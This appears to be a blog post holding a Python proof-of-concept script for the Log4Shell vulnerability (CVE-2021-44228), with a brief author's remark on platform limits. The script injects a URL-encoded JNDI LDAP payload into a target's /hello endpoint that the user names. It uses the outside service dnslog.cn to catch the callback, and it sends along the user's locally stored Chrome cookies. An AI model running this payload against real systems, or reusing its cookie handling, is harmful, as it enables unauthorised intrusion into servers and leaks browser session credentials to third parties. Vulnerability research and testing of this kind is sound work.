Poc_CVE-2021-44228 

 1 import requests
 2 from selenium.webdriver import Chrome
 3 from selenium.webdriver.support.ui import WebDriverWait
 4 from selenium.webdriver.common.by import By
 5 import time
 6 import urllib.parse
 7 import browser_cookie3
 8 
 9 
10 def jndi(dns):
11     dns = str(dns)
12     pay1 = '${jndi:ldap://'
13     pay2 = '/exp}'
14     pay_url1 = urllib.parse.quote(pay1)
15     pay_url2 = urllib.parse.quote(pay2)
16     pay_url = pay_url1 + dns +pay_url2
17     payload = 'payload='+str(pay_url)
18     return (payload)
19 
20 def verify(dns):
21     time.sleep(5)
22     driver.find_element(By.XPATH, '//*[@id="content"]/button[2]').click()
23     time.sleep(5)
24     ver = driver.find_element(By.XPATH, '//*[@id="myRecords"]/tbody/tr[2]/td[1]')
25     re = dns
26     flag = re in str(ver.text)
27 
28     if flag:
29         print("It looks likely vulnerable")
30     else:
31         print("It is strong")
32 
33 def exploit(url,dns):
34     cookie = browser_cookie3.chrome()
35     payload = url+'/hello?'+jndi(dns)
36     response = requests.get(url=payload,cookies=cookie)
37     print(response.text)
38     verify(dns)
39 
40 if __name__ == '__main__':
41     url = 'http://' + input('Please input your ip:port(such as--127.0.0.1:80):')
42     driver = Chrome()
43     driver.get("http://www.dnslog.cn/")
44     WebDriverWait(driver, 10).until(lambda d: "DNSLog" in d.title)
45     driver.find_element(By.XPATH, '//*[@id="content"]/button[1]').click()
46     time.sleep(5)
47     dns = driver.find_element(By.XPATH, '//*[@id="myDomain"]')
48 
49     exploit(url,dns.text)

鄙人才疏学浅(再加上没有申请个人域名,毕竟太贵~),该poc仅限用于安装了chrome的windows系统,并不支持linux等。。如果有可用域名的话,将verify里的内容改为域名的访问,然后修改一下main函数,即可同样用于linux~

posted @ 2022-06-26 16:59  wavesky  阅读(207)  评论(0编辑  收藏  举报